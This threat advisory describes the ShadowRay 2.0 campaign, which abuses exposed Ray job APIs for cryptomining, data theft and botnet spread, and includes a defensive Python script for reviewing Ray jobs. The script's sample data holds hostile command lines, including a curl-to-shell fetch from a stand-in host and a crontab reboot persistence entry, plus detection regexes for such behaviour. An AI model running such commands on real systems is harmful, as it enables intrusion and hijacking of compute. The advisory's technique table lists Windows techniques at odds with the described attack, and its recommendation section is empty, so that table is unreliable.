Threat Advisory

ShadowRay 2.0 Cluster Enables Stealthy Network Intrusion Operations

Threat: Malicious Campaign
Threat Actor Name: -
Threat Actor Type: -
Targeted Region: Global
Alias: -
Threat Actor Region: -
Targeted Sector: Technology & IT, Critical Infrastructure
Criticality: High

EXECUTIVE SUMMARY

Researchers identified a growing operation known as ShadowRay 2.0 that targets exposed Ray clusters by abusing CVE-2023-48022, a flaw that allows remote code execution when Ray job APIs are open to the internet. Even though Ray was designed for internal use, many users run it directly online, creating easy entry points for attackers. ShadowRay 2.0 scans exposed systems using automated callback checks and marks servers that run the probe command as active targets. Once identified, the attackers send jobs through the open API to place scripts, read system data, and spread the attack across all nodes linked to the cluster. Because the attack misuses Ray's built-in job system, it blends in with normal activity, which makes it harder to detect. The campaign has grown quickly due to the large number of open Ray dashboards found across different regions, many running without isolation or access controls. After gaining access, the attackers run miners, steal system data, and convert the AI cluster into part of a wider botnet. ShadowRay 2.0 also uses AI-written code to update tasks, bypass errors, and maintain a steady presence across clusters.

ShadowRay 2.0 follows a staged method that mirrors normal Ray use, allowing the attack to stay unnoticed. The attackers begin by sending small test commands to a large group of exposed servers. Any server that replies becomes part of the target list. After access is confirmed, they use the job API to submit tasks that collect hardware details, check GPU load, and plan how much compute to use without drawing attention. The scripts are simple and often appear AI-generated, helping the attackers change them quickly if they are blocked or removed. The attackers then expand through the cluster using Ray's ability to run jobs on many nodes at once, which gives them easy lateral movement. They install small miners that hide under system-like names and set up basic startup tasks to regain access after a reboot. The scripts also search for other miners and shut them down to control all resources. They switch between many online sources to keep payloads available even when older links are removed. Some scripts use region-aware logic, changing download steps depending on the server location to avoid blocks. By using Ray's normal functions, ShadowRay 2.0 operates quietly and spreads with little resistance.
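A defender-side review of jobs already submitted through the Ray Jobs API, as an added example that is not code from the advisory or from the Ray project. It assumes job records shaped like the Jobs API's job details (the field names submission_id, entrypoint and runtime_env are an assumption; the sample values are constructed) and flags the behaviours the advisory describes: remote scripts piped into an interpreter, encoded commands, startup persistence, termination of competing processes, and hidden paths.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample: three records shaped like Ray Jobs API job details
# (field names assumed from the Jobs API; every value here is invented).
SAMPLE_JOBS = json.dumps([
    {"submission_id": "raysubmit_aaa", "status": "SUCCEEDED",
     "entrypoint": "python train.py --epochs 10",
     "runtime_env": {"working_dir": "/srv/jobs/train"}},
    {"submission_id": "raysubmit_bbb", "status": "RUNNING",
     "entrypoint": "curl -s http://example.invalid/x.sh | sh",
     "runtime_env": {}},
    {"submission_id": "raysubmit_ccc", "status": "RUNNING",
     "entrypoint": "echo ... | base64 -d | bash; (crontab -l; "
                   "echo '@reboot /tmp/.kworker') | crontab -",
     "runtime_env": {"working_dir": "http://example.invalid/payload.zip"}},
])

# Heuristics matched against the job entrypoint: (label, regex).
RULES = [
    ("remote fetch piped to interpreter",
     re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|python3?)\b")),
    ("encoded command", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("startup persistence",
     re.compile(r"(\bcrontab\b|/etc/rc\.local|\bsystemctl\s+enable\b|\.bashrc)")),
    ("process termination", re.compile(r"\b(pkill|killall|kill\s+-9)\b")),
    ("hidden path in /tmp or /dev/shm", re.compile(r"/(tmp|dev/shm)/\.\w+")),
]


def review_jobs(jobs_json: str) -> dict:
    """Return {submission_id: [reasons]} for jobs that match any rule."""
    findings = {}
    for job in json.loads(jobs_json):
        entrypoint = job.get("entrypoint", "")
        reasons = [label for label, rx in RULES if rx.search(entrypoint)]
        # A working_dir pulled from a remote URL is a job-API-native way to
        # stage scripts on every node, so treat it as a finding on its own.
        working_dir = job.get("runtime_env", {}).get("working_dir", "")
        if urlparse(working_dir).scheme in ("http", "https"):
            reasons.append("working_dir fetched from remote URL")
        if reasons:
            findings[job["submission_id"]] = reasons
    return findings


if __name__ == "__main__":
    for sid, reasons in review_jobs(SAMPLE_JOBS).items():
        print(sid, "->", ", ".join(reasons))
```

The rules are coarse by design; in practice they belong on a job listing pulled from the dashboard on a schedule, with hits correlated against the cluster's change tickets.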

ShadowRay 2.0 shows how everyday deployment mistakes in AI systems can turn into major risks when exposed online. Instead of breaking software through complex flaws, the attackers use Ray's own design to run tasks, spread across nodes, and keep their tools active. This turns AI clusters into free compute power for mining, data theft, and long-term control. The steady rise in exposed Ray servers has made it easy for attackers to form a large and active network without needing special methods or heavy tools. Many of the tasks in ShadowRay 2.0 rely on simple code, often shaped by AI models, which lets the attackers rewrite and redeploy parts of the operation quickly. This flexibility keeps the campaign alive even when some servers are cleaned or taken offline. The use of region-based logic, hidden miners, and basic startup persistence shows that the attackers want lasting control rather than quick hits. The operation highlights how AI frameworks can become attack platforms when placed online without protection, allowing even small gaps to turn into large-scale threats. ShadowRay 2.0 serves as a reminder that AI systems need isolation and careful setup to prevent them from becoming part of global misuse.

THREAT PROFILE:

Tactic                 Technique ID   Technique                                  Sub-technique
---------------------  -------------  -----------------------------------------  ------------------------------------
Initial Access         T1195.002      Supply Chain Compromise                    Compromise Software Supply Chain
Execution              T1059.003      Command and Scripting Interpreter          Windows Command Shell
Persistence            T1547.001      Boot or Logon Autostart Execution          Registry Run Keys / Startup Folder
Privilege Escalation   T1055.012      Process Injection                          Process Hollowing
Defense Evasion        T1027.002      Obfuscated Files or Information            Software Packing
Credential Access      T1003          OS Credential Dumping                      LSASS Memory
Discovery              T1082          System Information Discovery               -
Lateral Movement       T1570          Lateral Tool Transfer                      -
Command and Control    T1105          Ingress Tool Transfer                      -
Exfiltration           T1041          Exfiltration Over C2 Channel               -


RECOMMENDATION:

REFERENCES:

The following reports contain further technical details:
https://www.bleepingcomputer.com/news/security/new-shadowray-attacks-convert-ray-clusters-into-crypto-miners/
https://www.oligo.security/blog/shadowray-2-0-attackers-turn-ai-against-itself-in-global-campaign-that-hijacks-ai-into-self-propagating-botnet
